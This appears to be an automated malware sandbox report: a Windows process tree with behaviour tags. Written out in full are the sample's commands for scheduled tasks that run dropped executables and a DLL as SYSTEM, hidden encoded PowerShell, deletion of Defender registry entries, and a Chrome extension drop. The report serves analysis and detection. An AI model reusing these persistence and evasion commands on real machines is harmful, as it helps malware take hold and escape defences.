C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ckXwTgLLPEtUwbToA" /SC once /ST 09:33:24 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MJuhmGroQWBIVyTj\cajiNWOIQNwNBJs\OMKHFdR.exe\" At /site_id 385107 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ckXwTgLLPEtUwbToA"2⤵PID:4812
-
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:376
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4620 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4356
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1288
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3112
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
- Drops file in Program Files directory
PID:4984 -
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4984_2064927614\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={13285b6f-aeaa-4c31-ba2d-b62070944a39} --system2⤵
- Executes dropped EXE
PID:1088
-
-
C:\Windows\Temp\MJuhmGroQWBIVyTj\cajiNWOIQNwNBJs\OMKHFdR.exeC:\Windows\Temp\MJuhmGroQWBIVyTj\cajiNWOIQNwNBJs\OMKHFdR.exe At /site_id 385107 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3868 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnNSajhVxJSdGghoLZ"2⤵PID:1996
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:1756
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:3080
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:868
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\sDZzDwaoU\jGcLAk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FeYIZJMIrDMHpta" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FeYIZJMIrDMHpta2" /F /xml "C:\Program Files (x86)\sDZzDwaoU\KvAeUNL.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FeYIZJMIrDMHpta"2⤵PID:1080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FeYIZJMIrDMHpta"2⤵PID:3860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NXGwaAPLNQhZTI" /F /xml "C:\Program Files (x86)\EqfDIhLUOuAU2\kNeSGxe.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BDVfvgxmFKLpI2" /F /xml "C:\ProgramData\tcytjYddvuQvqLVB\jcjOHzb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4452
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nVyYSLaLZpeELibNc2" /F /xml "C:\Program Files (x86)\bUnTyWxqoVMNmzCpZNR\vZGhkIX.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4132
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SXQGDRXFvEUIaERUonw2" /F /xml "C:\Program Files (x86)\nWqLCKNYOCKLC\tCCGmgb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zCCIxqGdnvUEnSAiG" /SC once /ST 19:23:33 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\MJuhmGroQWBIVyTj\vHnuoCIy\fQZxQcp.dll\",#1 /site_id 385107" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "zCCIxqGdnvUEnSAiG"2⤵PID:4160
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pVvXl1" /SC once /ST 15:20:39 /F /RU "Admin" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" --restore-last-session"2⤵
- Creates scheduled task(s)
PID:1432
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "pVvXl1"2⤵PID:1668
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MJuhmGroQWBIVyTj\vHnuoCIy\fQZxQcp.dll",#1 /site_id 3851071⤵PID:1208
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\MJuhmGroQWBIVyTj\vHnuoCIy\fQZxQcp.dll",#1 /site_id 3851072⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4424 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zCCIxqGdnvUEnSAiG"3⤵PID:216
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2648 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x100,0x104,0x108,0xd8,0x10c,0x7ffc48ad4f50,0x7ffc48ad4f60,0x7ffc48ad4f702⤵PID:2076
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1760 /prefetch:22⤵PID:4280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1816 /prefetch:82⤵PID:2152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:82⤵PID:1436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2340 /prefetch:12⤵PID:3048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2544 /prefetch:12⤵PID:3200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:12⤵PID:2468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:12⤵PID:2992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:12⤵PID:3192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5032 /prefetch:82⤵PID:3328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5044 /prefetch:82⤵PID:1860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1748,14205026939858557575,6131460415176358007,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4408 /prefetch:82⤵PID:4480
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4004
Network
MITRE ATT&CK Enterprise v6
Downloads